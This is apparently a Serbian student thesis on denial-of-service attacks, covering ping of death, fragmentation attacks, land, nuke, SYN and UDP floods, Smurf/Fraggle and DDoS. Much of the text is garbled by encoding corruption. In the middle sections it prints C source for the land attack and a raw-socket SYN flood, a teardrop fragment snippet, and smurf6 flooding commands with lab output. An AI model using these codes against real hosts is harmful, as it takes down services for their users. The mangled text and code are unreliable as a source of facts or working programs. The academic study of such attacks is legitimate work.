Napadi Na Racunarske Sisteme u Cilju Uskracivanja Mreznih Usluga

8/11/2019 Napadi Na Racunarske Sisteme u Cilju Uskracivanja Mreznih Usluga

1/38

i

VISOKA KOLA ELEKTROTEHNIKE I RAUNARSTVASTRUKOVNIH STUDIJA

Abazovi Sanja

NAPADI NA RAUNARSKE SISTEME U CILJUUSKRAIVANJA MRENIH USLU!A

" # i $ % & ' ( ) i * + # "

,-o.*a#/ j0n 12345


2/38

Kndidt: Abazovi Sanja

Br indks: R6"47832

Smr: R+90n+*()+ :;ni< 0(%0.a

snvni zdci:

35 D-?ini(anj- na$a#a 9iji j- =i%j 0()*aivanja '*->ni< 0(%0.a i o$i((:an#a*#ni< '-:o#a

15 O$i( 'o.0no(:i za@:i:- i $*o=-na -?i)a(no(:i

5 P*a):i9na #-'on(:*a=ija )a*a):-*i(:i9ni< na$a#a i '-:o#o%o.ijaza@:i:-

Hrdvr: Sftvr: ri:

Mentor:Bgrd, maj !"#$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

dr &oran Banjac


3/38

IBVD

'redmet rada s( na)adi ( ci*j( (skra+ivanja (s*(ga tzv$DoSna)adi, raz*iite vrste i naini na kojimog( da se )okren( i na koji nain mo-emo da se od.ranimo od nji/$ 0i*j ovog rada je da se(ka-e na )ro.*em koji je ( )ret/odne tri godine )ostao jedan od najistakn(tiji/ )ro.*emavezani/ sa 1nternetom i mre-ama ( ce*ini$

A,STRACT

S(.ject of t/is 2ork are attacks denia* of service, different t3)es and /o2 t/e3 can .e r(nand /o2 2e can defend o(rse*ves against t/em$ 4/e goa* is to )oint o(t t/e )ro.*em in t/e )ast

t/ree 3ears /as .ecome one of t/e most )rominent )ro.*ems associated 2it/ t/e 1nternet andnet2orks in genera*$


4/38

Sadr-aj" 5vod$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"

4radiciona*ni 6oS na)adi$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$" 'reve*iki )aketi$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#

$ 'rek*a)anje fragmenata$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$7

$8 'ovratno )*av*jenje$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$7

$# 9a)adi 9(kerom$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"!

$ 'rekomerno fragmentiranje$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$""

$; 9a)adi na 9etB1


5/38

#$#$# 'rik*j(ivanje na a*ternativn( infrastr(kt(r( i*i na a*ternativan re-im rada a)*ikacijeE

&ak*j(ak$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$8!

; Fiterat(ra$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$8"


6/38


7/38

Sanja .azovi+, G4C#;="!:Napadi na raunarske sisteme u cilju uskraivanja mrenih usluga

3 Uvo#

Gazvojem ra(narstva i ra(narski/ mre-a vremenom se )ose.no )ostavi*o )itanje.ez.ednosti$ 'ro.*em .ez.ednosti je (kratko sveden na )ostizanje tri ci*ja:

)over*jivost )odataka confindentia*it3IJ ce*ovitost integrit3IJ ras)o*o-ivost i*i dost()nost )odataka availabitityI$

5 sk*ad( sa tim, )redmet (gro-avanja ra(nara i*i ra(narske mre-e mo-e .iti jedan odtri navedena segmenta$

9a)adi (smereni na ra(nare i*i mre-e se )o )ravi*( de*e na )asivne, koje ne (ti(ne)osredno na )onaAanje sistema i njegovo f(nkcionisanje, kao Ato je )resretanje, i aktivne, kojemog( (ticati na )onaAanje i f(nkcionisanje sistema i*i na sadr-aj )odataka, )od kojima)odraz(mevamo:

)resecanjeJ

izmen( )odatakaJ fa.rikovanje )odataka$

5 ovom rad( +emo se .aviti )resecanjem )odataka kao aktivnim o.*ikom na)ada naras)o*o-ivost )odataka i*i mre-a$ Gas)o*o-ivost )odataka )odraz(meva sig(rnosni ci*j i zadatakkoji o.ez.e(je da samo ov*aA+eno *ice mo-e )o(zdano i )ravovremeno da )rist()i )odacima,ra(narskim res(rsima i*i ra(narskoj mre-i$ 'od )resecanjem, )ak, )odraz(mevamo )rekid tokainformacija odn$ onemog(+avanje )r(-anja neke (s*(ge i*i f(nkcionisanja nekog sistema$5 ra(narstv(, na)ad (smeren na (skra+ivanje odn$ ras)o*o-ivost (s*(ga eng*$ denial of service,DoSI odn$ )odataka )redstav*ja tradiciona*ni, )a i osnovni, o.*ik (gro-avanja$ 4o je najeA+e)rimenjivan na)ad na ra(narsk( mre-( koji izaziva )restanak rada servisa i*i ra(narskog

)rograma, ime se dr(gim korisnicima onemog(+ava rad sa tim servisima i*i )rogramima$Kao )ose.an o.*ik DoSCa se vremenom )ojavio distri.(irani na)ad (smeren na (skra+ivanje(s*(ga eng*$ distributed denial of service,DDoSI koje )redstav*ja )ok(Aaj da se kom)j(terski i*imre-ni res(rsi (ine nedost()nim korisnicima koji i/ )otra-(j($1ako naini izvoenja, mete i motivi ovi/ na)ada mog( varirati, oni se (g*avnom sastoje odna)ora jedne i*i viAe oso.a da )rivremeno i*i na neodreeno )rekidaj( i*i ometaj( servise /osta)rik*j(enog na 1nternet$ S kraja !$ i )oetka "$ veka, na)adi (smereni na (skra+ivanje (s*(gaevo*(ira*i s( od najo.iniji/ ne(godnosti do veoma o)asne )retnje e*ektronskoj trgovini a*i idr(gim o.*icima )rivrednog odnosno komercija*nog de*ovanja$

"


8/38


'rvo.itne te/nikeDoSna)ada (g*avnom s( se os*anja*e na z*o()otre.( )ro)(sta ( o)erativnomsistem( )otek*i/ najviAe od )roizvoaki/ rea*izacija )rotoko*a 40'=1'$ 4i na)adi s( vremenomstek*i raznorazne nazive kao Ato s(Ping-f-Death, Smurf,!raggle, boinki teardropi (s)eva*i s(

da efikasno o.araj( )ojedinane ra(nare jednostavnom sekvencom )aketa$ 4akvi na)adi s(mog(+i sve dok )omen(ti softverski )ro)(sti ne .(d( zakr)*jeni$

Slika "# Scenario DoS napada

Svet je !!!$ godine video nov( vrst( DoS na)ada L distri.(irani na)ad (smeren na(skra+ivanje (s*(ga, DDoS$ Karakteristika ovog na)ada je da on organiz(je /orde ra(nara na1nternet( da sin/rono Aa*j( ne*egitimne za/teve kojima se mog( )re)*aviti sistemi ak i najve+i/dava*aca mre-ni/ (s*(ga$ 4e/nike koje s( se koristi*e ( ovim na)adima (smeravane s( naraz*iite sk()ove karakteristika )rotoko*a 40'=1', )rvenstveno na njegovo ogranienje .roja

s(mnjivi/ S>9 za/teva koje mo-e 40'=1' )rotoko* da o.radi$ 4akvi na)adi mog(, iakozastare*i, .iti efikasno or(e za izn(ivanje informacija iz mre-e, jer ve+ina mre-ni/infrastr(kt(ra nije adekvatno zaAti+ena, niti mo-e da o.radi )o)*av( za/teva koji se generiA(tokom savremenogDDoSna)ada$

Dedan od o)asniji/ o.*ika evo*(irani/ ,,jedno)aketni/ na)ada ( distri.(irane na)adekojima je ci*j zasi+enje ka)aciteta informacionog sistema, jeste )ojava takozvani/ $ombi mreaeng*$$ombie net%orksI$ 4aj fenomen je )rvi )(t za)a-en )os*e dotad nevienog na)ada koji je (

&rtva

Napada

Putanjanapada


9/38


fe.r(ar( !!!$ godine )rivremeno iz.acio iz tren(tne o)erativne ()otre.e najve+e mre-neservise kao Ato s(: >a/ooN, eBa3, 099 i dr(gi$

&om.i mre-( ine z*o()otre.*jeni ra(nari koji s( ( )ot)(noj v*asti (da*jenog na)adaa$'omo+( ro.otskog softvera, na)ada emit(je eng*$ broadcastI nared.e *egijama inficirani/ra(nara (jedinj(j(+i nji/ove snage i istovremeno )re(zimaj(+i mre-e za koje s( oni )rik*j(eni

da .i nji/ovim sin/ronim radom )re)*avio ka)acitet ak i najve+i/ mre-ni/ servisa$ 5)rkos()ozorenjima str(njaka za .ez.ednost, koja s( sve .rojnija ( fe.r(ar( !!!$, )ro.*em( DDoSna)ada nikada nije )osve+ena d(-na )a-nja, a )rema nekim )rocenama ( svet( danas )ostoji)reko "!!!! ra(nara zom.ija, s)remni/ .ez ikakvog ()ozorenja, a na komand(, za(zme svak(*okacij( na 1nternet($

're neko*iko godina na)adDDoSse sa infrastr(kt(re okren(o novoj meti L a)*ikacijamaza o.av*janje mre-nog )os*ovanja$ 4ako s( v*asnici maAina za )retra-ivanje 1nterneta Ooog*e,>a/ooN i dr(giI )osta*i nenamerne -rtve jedne varijante crva M36oom koji je j(*a !!#$, tra-e+inove )otencija*ne -rtve, veoma za/tevno koristio nji/ove javne )retra-ivae$ O*avna raz*ikaizme( ovakvog na)ada i raniji/ na)ada n)r$ )*av*jenja S>9 )aketimaI jeste koriA+enje*egitimni/ za/teva koji enormno ()oA*javaj( *ogik( )os*ovanja ci*jne a)*ikacije$ Kada se na)ad

ojaa )rimenom distri.(irani/ zom.i mre-a, njegov efekat je joA razorniji$ 9aj.o*nije jeverovatno to Ato -rtveDDoSna)ada nemaj( ime da se od.rane od zom.i ra(nara sa 1nterneta,koji s( i sami svojevrsne -rtve$DoS i DDoSna)adi na s*oj a)*ikacija koji se izvode direktnim(s)ostav*janjem veze )rogramerima mre-ni/ a)*ikacija )ostav*jaj( znatno s*o-enije zadatke, jerosim ras)o*o-ivosti moraj( da )oved( ra(na i o mre-noj .ez.ednosti, diskretnosti i integritet($

DoSna)adi ne (gro-avaj( samo, (s*ovno reeno, mre-no )os*ovanje, ve+ i va-ne dr-avneinfrastr(kt(re$ 5 e*ektronskom svet(, nakon teroristiki/ na)ada ""$ se)tem.ra !!"$ godine,esto je mnogo *akAe )oremetiti rad mre-e i*i sistema, nego neov*aA+eno (+i ( nji/$ 5voenjemind(strijski/ sistema nadg*edanja, ()rav*janja i )rik()*janja )odataka Supervisory 'ontrol andData ()uisition, S'(D(I )ovezani/ sa 1nternetom rizik od mog(+i/DoSna)ada granii se sakatastrofom$

8


10/38


1 T*a#i=iona%ni DoS na$a#i

DoS denial of serviceI je jedan od najeA+e )rimenjivani/ na)ada na mre-( i izaziva)restanak rada servisa i*i )rograma, ime se dr(gim korisnicima onemog(+ava rad sa timservisima i*i )rogramima$ 9)aketa *'P connection re)uestI$ 'rimeri tradiciona*ni/ osnovni/I DoSna)ada .i .i*i s*ede+i:

2.1 Preveliki paketi

Dedan od )rvi/DoSna)ada je o.ino izvoen (smeravanjem )rogramaping of deathnaPindo2s sistem$


11/38


1': @ragment offset Q ! .3tes1': 4ime to *ive Q 8 seconds=/o)s1': 'rotoco* Q " 10M'I10M': CCCCC 10M' /eader CCCCC10M':

10M': 43)e Q 7 Uc/oI10M': 0ode Q !Bitne vrednosto koje se odnose na )rikazan( fragmentacij( s(:1dentification Q #;77"4ota* *engt/ Q ;!More @ragments Q !@ragment offset Q !P*i'-* b*5 1C C C C C C C C C C C C C C C C C C C Pa)-: 3 C C C C C C C C C C C C C C C C C C C C1': CCCCC 1' Header CCCCC1': 4ota* *engt/ Q "!! .3tes

1': 1dentification Q 88;1': @*ags Q T1': $!$$ $$$$ Q ma3 fragment1': $$"$ $$$$ Q more fragments1': @ragment offset Q ! .3tes1': 4ime to *ive Q 8 seconds=/o)s1': 'rotoco* Q " 10M'I10M': CCCCC 10M' /eader CCCCC10M':10M': 43)e Q 7 Uc/oI10M': 0ode Q !

C C C C C C C C C C C C C C C C C C C Pa)-: 1C C C C C C C C C C C C C C C C C C C C1': CCCCC 1' Header CCCCC1': 4ota* *engt/ Q "!! .3tes

1': 1dentification Q 88;1': @*ags Q T1': $!$$ $$$$ Q ma3 fragment1': $$"$ $$$$ Q more fragments1': @ragment offset Q "#7! .3tes1': 4ime to *ive Q 8 seconds=/o)s1': 'rotoco* Q " 10M'I

C C C C C C C C C C C C C C C C C C Pa)-: C C C C C C C C C C C C C C C C C C C C1': CCCCC 1' Header CCCCC1': 4ota* *engt/ Q ;7 .3tes1': 1dentification Q 88;1': @*ags Q !T1': $!$$ $$$$ Q ma3 fragment1': $$!$ $$$$ Q *ast fragment1': @ragment offset Q E;! .3tes


12/38


1': 4ime to *ive Q 8 seconds=/o)s1': 'rotoco* Q " 10M'IBitne vrednosti koje se koje se odnose na fragmentacij( s(:

Pa)-: 3 Pa)-: 1 Pa)-: +dentification 88; 88; 88;*otal .ength "!!C!VQ"#7! "!!C!VQ"#7! ;7C!VQ#7,ore fragments " " !!ragment offset ! "#7! E;!

V C 1' /eader

Sada tre.a iskoristiti )rogram targa da .i se )okren(ojoltna)ad i ana*izirati ga (z )omo+tc)d(m)Ca$

Slika /#Pokretanje *arga programa na acktrack-u

;


13/38


1skoriA+ena je o)cija da se )okrenejoltna)ad izDoSa*atke targaDoS$ Sada se ( tc)d(m)C()og*edati Ata je (raeno$

Slika 0# *cpdump

Wta se vidi:3 Wa*je se mnogo fragmentovani/ )aketaJ1'aketi s( iz(zetno fragmentovaniJ S*anje nije izvrAeno )o redos*ed( Ato se vidi )os*e ofseta #;?8; kada s*edi ofset #?"!J4 @ragmentacija je nedo)(Atena, Ato ( )rikaz( izg*eda ovako:)rimer ofsetCa X d(-ina Q s*ede+iCofset#;?8;X#!!C!IQ#?""; NQ#?"!

?


14/38


Slika 1#+$gled u 2iresharku

2.2 Preklapanje fragmenata

9)aket koji sadr-i ist( 1'adres( kao i izvorodrediAne adrese ime )ot)(no zak*j(ava sistem -rtve$

Fand$c[inc*(de \stdio$/]

[inc*(de \netd.$/][inc*(de \ar)a=inet$/][inc*(de \netinet=in$/][inc*(de \s3s=t3)es$/][inc*(de \s3s=socket$/][inc*(de \netinet=i)$/][inc*(de \netinet=i)%tc)$/][inc*(de \netinet=)rotoco*s$/]

7


15/38


str(ct )se(do/dr^ str(ct in%addr saddrJ str(ct in%addr daddrJ (%c/ar zeroJ (%c/ar )rotoco*J

(%s/ort *engt/J str(ct tc)/dr tc)/eaderJ_J

(%s/ort c/ecks(m(%s/ort V data,(%s/ort *engt/I^ register *ong va*(eJ (%s/ort iJ

foriQ!Ji\*engt/]]"IJiXXI va*(eXQdataìJ

if*engt/b"IQQ"I va*(eXQdataì\\7IJ

va*(eQva*(eb;8IXva*(e]]";IJ

ret(rnva*(eIJ_

int mainint argc,c/ar V V argvI^ str(ct sockaddr%in sinJ str(ct /ostent V /osteJ int sockJ c/ar .(ffer`#!J str(ct i)/dr V i)/eaderQstr(ct i)/dr VI .(fferJ

str(ct tc)/dr V tc)/eaderQstr(ct tc)/dr VI .(fferXsizeofstr(ct i)/drIIJ str(ct )se(do/dr )se(do/eaderJ

f)rintfstderr,R*and$c .3 m8*t, @F0nRIJ

ifargc\8I ^ f)rintfstderr,R(sage: s 1' )ortnR,argv`!IJ ret(rnC"IJ _

.zerobsin,sizeofstr(ct sockaddr%inIIJ sin$sin%fami*3Q@%19U4J

if/osteQget/ost.3nameargv`"IINQ95FFI .co)3/osteC]/%addr,bsin$sin%addr,/osteC]/%*engt/IJ e*se ifsin$sin%addr$s%addrQinet%addrargv`"IIQQC"I ^ f)rintfstderr,R(nkno2n /ost snR,argv`"IJ ret(rnC"IJ _

ifsin$sin%)ortQ/tonsatoiargvÌIIQQ!I

E


16/38


^ f)rintfstderr,R(nkno2n )ort snR,argv`IJ ret(rnC"IJ _

ifsockQsocket@%19U4,S9J tc)/eaderC]t/%offQsizeofstr(ct tc)/drI=#J tc)/eaderC]t/%2inQ/tons!#7IJ

.zerob)se(do/eader,"Xsizeofstr(ct tc)/drIIJ )se(do/eader$saddr$s%addrQsin$sin%addr$s%addrJ )se(do/eader$daddr$s%addrQsin$sin%addr$s%addrJ )se(do/eader$)rotoco*Q;J )se(do/eader$*engt/Q/tonssizeofstr(ct tc)/drIIJ

.co)3c/ar VI tc)/eader,c/ar VI b)se(do/eader$tc)/eader,sizeofstr(ct tc)/drIIJ tc)/eaderC]t/%s(mQc/ecks(m(%s/ort VI b)se(do/eader,"Xsizeofstr(ct tc)/drIIJ

ifsendtosock,.(ffer,sizeofstr(ct i)/drIXsizeofstr(ct tc)/drI,!,str(ct sockaddr VI bsin,sizeofstr(ctsockaddr%inIIQQC"I ^ f)rintfstderr,Rco(*dnt send )acketnRIJ ret(rnC"IJ _

f)rintfstderr,Rs:s *andednR,argv`",argv`IJ

c*osesockIJ

ret(rn!IJ_

2.4 Napadi Nukerom

Nukeje zastare*iDoSna)ad )rotiv ra(narski/ mre-a koji se sastoji od fragmentirani/ i*ina dr(gi nain neva-e+i/ 10M' )aketa )os*ati/ na ci*j$ 4i )aketi s( na)rav*jeni )omo+(

"!


17/38


modifikovani/ )ing (s*(ga da sta*no Aa*je ove kor(m)irane )odatke, ime se (s)orava ra(narsve dok ne doe do )ot)(nog za(stav*janja$


18/38


)kt$i)$saddr Q src%addrJ)kt$i)$daddr Q dst%addrJ)kt$i)$frag%off Q /tons 7"E!IJif )ortI^

)kt$)roto$(d)$so(rce Q /tons)ort"8IJ)kt$)roto$(d)$dest Q /tons)ortIJ)kt$)roto$(d)$*en Q /tonsEIJ)kt$data Q aJ_ e*se ^)kt$)roto$icm)$t3)e Q 10M'%U0H


19/38


Sav*-'-ni DoS na$a#i

Savremene )retnje )redstava*jaj( na)adi (smereni ka iscr)*jivanj( res(rsa, )oznati i kaona)adi na )ro)(sni o)seg zaAtitnog zida eng*$fire%allI$ 'oAto je k*asine na)ade koji iscr)*j(j(res(rse )ojedinani/ ra(nara (g*avnom onemog(+i*o )rogramasko kr)*jenje o)erativni/sistema, savremeni na)adi s( direktno (smereni ka iskoriA+avanj( ce*og ka)aciteta mre-e kako.i se onemog(+io rad *egitminim korisnicima$ 6va najva-nija na)ada (smerena na iscr)*jivanjeka)aciteta s(:

9a)ad na s*oj infrastr(kt(reJ 9a)ad na s*oj a)*ikacijaJ

3.1 "oS napad na #loj infra#trukture

3.1.1 Plavljenje S$N paketima

Sk() mre-ni/ )rotoko*a 40'=1' ()tre.*java se ( otvorenoj sredini ( kojoj v*ada(zajamno )overenje, )a njegova verzija koja se danas najeA+e koristi 1'v#I ima (n(traAnjes*a.osti$ Kada se )okrene (s)ostav*janje 40' veze, odvija se troste)en )roces, tzv$ troste)eno(sag*aAavanje S>9 )aket koji Aa*je k*ijent, S>9=0K )aket koji Aa*je server i 0K )aket kojiAa*je k*ijentI$ 'oetni )aket S>9 )re.ac(je vez( ( ,,)o*(otvoreno stanje, koje se mo-eiskoristiti za iscr)*jivanje res(rsa servera$ 5 norma*nim oko*nostima )aket S>9 se Aa*je sa

odreenog soketa sistema na odreeni sistema B koji je ( stanj( F1S4U9$ Kada )rimi )aket,)otencija*na veza na sistem( B )re*azi ( stanje S>9%GU0Z, a sistem B +e )ok(Aati da sistem( odgovori )aketomS>9=0K$ ko sve .(de (red( sistem +e )onovo)os*ati )aket 0K i veza +e.iti (s)ostav*jena$

"$ 0*ient CCS>9 'acketCC]Server$ Server CCS>9=0K 'acket

CC] 0*ient8$ 0*ient CC0K 'acket CC] Server

"8


20/38


Slika 7#*ri fa$e uspostavljanja *'P ve$e 4 *hree-%ay handshake8

1ako o)isani me/anizam (g*avnom radi do.ro, mog(+e je da se )ojavi )ro.*em jer ve+inasistema dode*j(je konaan .roj res(rsa vezano ( stanj( S>9%GU0Z, )otencija*nim vezama kojenis( joA )ot)(no (s)ostav*jene iako ve+ina sistema mo-e da )odr-i stotine ()oredni/ veza naistom )ort( )otre.no je joA samo desetak )aketa koji za/tevaj( (s)ostav*janje veze )a da seiscr)e svi res(rsi namenjeni za t( svr/($ 5)ravo )omo+( tog me/anizma na)adai .*okiraj(sistem )o)*avomS>9 )aketa$

9a)ada fa*sifik(je, *a-ira adres( sa koje Aa*je )aket, a dr(gi sistem odgovara )aketomS>9=0K Aa*j(+i ga na ne)ostoje+( adres($

6a taj sistem )ostoji on .i sistem( B norma*no odgovorio )aketom GS4 zato Ato nije)okren(o )ost()ak za (s)ostav*janje veze zato na)ada (vek .ira nedost()an sistem$ SistemBi+e )os*ati )aket S>9=0K i nikad ne+e )rimiti odgovor$ 'redmetna veza se na*azi ( stanj(

S>9%GU0Z i smeAta se ( red ekanja za )ot)(no (s)ostav*janje veze$ Gad sistema +e .iti)odre+en (s)ostav*janj( ove veze koja se mo-e )rekin(ti tek kad istekne vreme za (s)ostav*janjeveze )redvieno tajmerom ?secC8minI$ 'oAto je red ekanja za (s)ostav*janje veze o.ino)ri*ino kratak, na)ada mora na svaki/ "! sek(ndi da )oAa*je neko*iko S>9 )aketa da .i)ot)(no .*okira*i odreeni )rik*j(ak$ 9a)adn(ti sistem nikad ne+e sti+i da oisti red ekanja jer+e (vek stizati novi S>9 )aket$

&a )okretanje (s)eAne )o)*ave S>9 )aketa )otre.an je veoma skroman )ro)(sni o)seg"#,#k.=sI, na)ad je )rikriven jer na)adai izmiA*jaj( izvoriAn( adres( S>9 )aketa z.og ega i/je teAko identifikovati$S>9 @*ood sa F195Tsoketima:

"8#;?7E"!""""8

"#"";"?"7"E!"

[inc*(de\stdio$/][inc*(de\string$/] ==memset[inc*(de\s3s=socket$/][inc*(de\std*i.$/] ==for eYit!IJ[inc*(de\errno$/] ==@or errno C t/e error n(m.er[inc*(de\netinet=tc)$/] =='rovides dec*arations for tc) /eader[inc*(de\netinet=i)$/] =='rovides dec*arations for i) /eaderstr(ct)se(do%/eader ==needed for c/ecks(m ca*c(*ation^ (nsigned intso(rce%addressJ (nsigned intdest%addressJ (nsigned c/ar)*ace/o*derJ

(nsigned c/ar)rotoco*J (nsigned s/orttc)%*engt/J

str(cttc)/dr tc)J_J(nsigned s/ortcs(m(nsigned s/ortV)tr,intn.3tesI ^ register*ongs(mJ (nsigned s/ortodd.3teJ

"#


21/38


8#;?7

E8!8"8888#88;8?878E#!#"##8####;#?#7#E!"8

#;?7E;!;";;8;#;;;

;?;7;E?!?"??8?#?

registers/ortans2erJ

s(mQ!J 2/i*en.3tes]"I ^ s(mXQV)trXXJ n.3tesCQJ

_ ifn.3tesQQ"I ^ odd.3teQ!J V(%c/arVIbodd.3teIQV(%c/arVI)trJ s(mXQodd.3teJ _

s(m Q s(m]]";IXs(m b !YffffIJ s(m Q s(m X s(m]]";IJ ans2erQs/ortIs(mJ

ret(rnans2erIJ_

intmain voidI^ ==0reate a ra2 socket ints Q socket '@%19U4, S


22/38


?;???7?E7!7"

7787#77;7?777EE!E"EE8E#EE;E?E7EE"!!"!""!"!8"!#"!"!;

"!?"!7"!E""!"""""""8""#"""";""?""7""E

"!""""8"#"";"?"7

==40' Header

tc)/C]so(rce Q /tons "8#IJ tc)/C]dest Q /tons 7!IJ tc)/C]se Q !J tc)/C]ack%se Q !J

tc)/C]doff Q J =V first and on*3 tc) segment V= tc)/C]finQ!J tc)/C]s3nQ"J tc)/C]rstQ!J tc)/C])s/Q!J tc)/C]ackQ!J tc)/C](rgQ!J tc)/C]2indo2 Q /tons 7#!IJ =V maYim(m a**o2ed 2indo2 size V= tc)/C]c/eck Q !J=V if 3o( set a c/ecks(m to zero, 3o(r kerne*s 1' stack s/o(*d fi** in t/e correct c/ecks(m d(ring transmission V= tc)/C](rg%)tr Q !J ==9o2 t/e 1' c/ecks(m

)s/$so(rce%address Q inet%addr so(rce%i) IJ )s/$dest%address Q sin$sin%addr$s%addrJ )s/$)*ace/o*der Q !J )s/$)rotoco* Q 1''G


23/38


"E"8!"8""8"88

_ ==_

ret(rn!J_

3.1.2 Plavljenje %"P paketima


24/38


Slika en :DP poplavom

3.1.3 Poja&anje'Smurf i (raggle

9a)ad ti)a Smurfje )o )rvi )(t i nenamerno demonstirao mog(+nost )ojaanjaDoSna)ada na1nternet($ Ufekat )ojaanja se )osti-e kada za/tevi za dif(zno emitovanje signa*a )ing (smere namre-( sistema koji +e na nji/ odgovoriti$

5smeren za/tev za dif(zno emitovanje signa*a )ing mo-e da se )oAa*je na adres( mre-ei*i na njen( adres( za dif(zno emitovanje$ da .i se to )ostig*o neo)/odan je (reaj kojio.ez.e(je f(nkciona*nost dif(znog emitovanja sa 1's*oja na mre-ni s*oj$ ko )ret)ostavimo da)ostoji mre-a k*ase 0 koja dode*j(je #C.itne adrese, adresa mre-e +e .iti $! a njena adresa za

dif(zno emitovanje $$ 5smeravanje dif(znog emitovanja najeA+e se koristi ( dijagnostikesvr/e da .i sag*eda*i -ivi sistem ( mre-i, a da ne mora da se svakom od nji/ )ojedinano Aa*jesigna* )ing$


25/38


Sm(rf; je *oka*na sm(rf a*atka )reko koje mo-e da se izvrAi na)ad ( *oka*noj mre-i, amo-e da s*(-i i za is)itivanje )ro.oja mre-e eng*$net%ork stress testingI $


26/38


slika 6# Prika$ otvorenog programa Smurf 7

&a startovanje na)ada Smurf7: komandna sintaksa : sm(rf; \ interface ] \ -rtvina 1' adresa ]$ )rimer : sm(rf; et/" !$!$!$ Smurf7)oinje da )o)*av*j(je -rtv( sa 10M'v;)aketima $

Slika "3#Startovanje napada Smurf7

!


27/38


slika ""#(ktivnost acktrack 5#3 sistema u normalnom stanju

slika ""#Stanje acktrack 5#3 sistema posle preplavljivanja

"


28/38


slika "/#Stanje acktrack 5#3 sistema kada smo obustavili Smurf7 napad sa ?ali .inu;a4normalno stanje8

6a .i se )otvrdi*o koji je )rotoko* )reo)tere+en na Backtrack5#3sistem( koristi se Pires/arkZidi se da je koriA+en 10M'v; $

slika "0#2ireshark pokrenut sa acktrack 5#3


29/38


'ret)ostavimo da na)ada Aa*je "#k odr-ivog 10M' so.ra+aja na adres( za dif(znoemitovanje )ojaivake mre-e sa sto sistema$ 9a)adaeva mre-a je na 1nternet )rik*j(enadvokana*nom 1S69vezom, )ojaivaka mre-a )reko 48*inije .rzine )renosa # m.=s, a mre-a-rtve )reko 4"*inije .rzine ",##m.=s$ ko ekstra)o*iramo .rojeve (tvrdi+emo da na)ada mo-e

da generiAe "#m.=s sao.ra+aja ka mre-i -rtve$ 5 takvim (s*ovima -rtva ima ma*o Aanse da)re-ivi ovaj na)ad, jer +e se vr*o .rzo iscr)eti ras)o*o-iv )ro)(sni o)seg njene 4" *inije$Zarijanata o)isanog na)ada je na)ad ti)a @ragg*e$ 5mesto da kao ( na)ad( ti)a Sm(rf

koristi 10M' )akete fragg*e koristi 56' )akete na)adai mog( da )oAa*j( fa*sifikovane 56')akete na adres( za dif(zno emitovanje )ojaivake mre-e, ra(nar( -rtve odgovori+e svakisistem na mre-i ( kome je aktivirana (s*(ga U0H< i tako +e generisati ve*iki sao.ra+aj$ ko(s*(ga U0H< nije aktivirana na sistem( (n(tar )ojaivake mre-e Ato je danas skoro standardnotaj ra(nar +e emitovati 10M' )or(k( koja +e i)ak )otroAiti deo )ro)(snog o)sega$

3.1.4 ""oS

1ako s( na)adi ti)a Sm(rf i @ragg*e do-ive*i kratk( )o)(*arnost, )oste)eno s( izaA*i izmode kada s( davaoci mre-ni/ (s*(ga )oe*i da .*okiraj( (smerene 1' za/teve za dif(zno s*anje)aketa na koje s( se ovi na)adi os*anja*i$ &*onamerni /akeri s( se odma/ okren(*i ka isto takoefikasnom me/anizm( )ojaavanja koji se mnogo te-e .*okira, distri.(iranom na)ad( ( ci*j((skra+ivanja (s*(ga, a !!!$ godine se desio )rvi masovni DDoSna)ad$ 'rokren(t je )rvo )rotiv*okacije >a/oo, a zatim eBa3, B(3$com i dr(gi/ i o.orio sedam ve+i/ Pe. *okacija i joA mnogomanji/$

9ajviAe je za.rinjava*o to Ato je izg*eda na)ad )otekao iz viAe izvora, od koji/ se nis( svimog*i dovesti ( direktn( vez( sa na)adaem$4raganje za na)adaima je (g*avnom dove*o dos*a.o zaAti+eni/ i nea-(rirani/ ra(nara$ 9oviji na)adi, me(tim )oti( sa Airoko)ojasni/

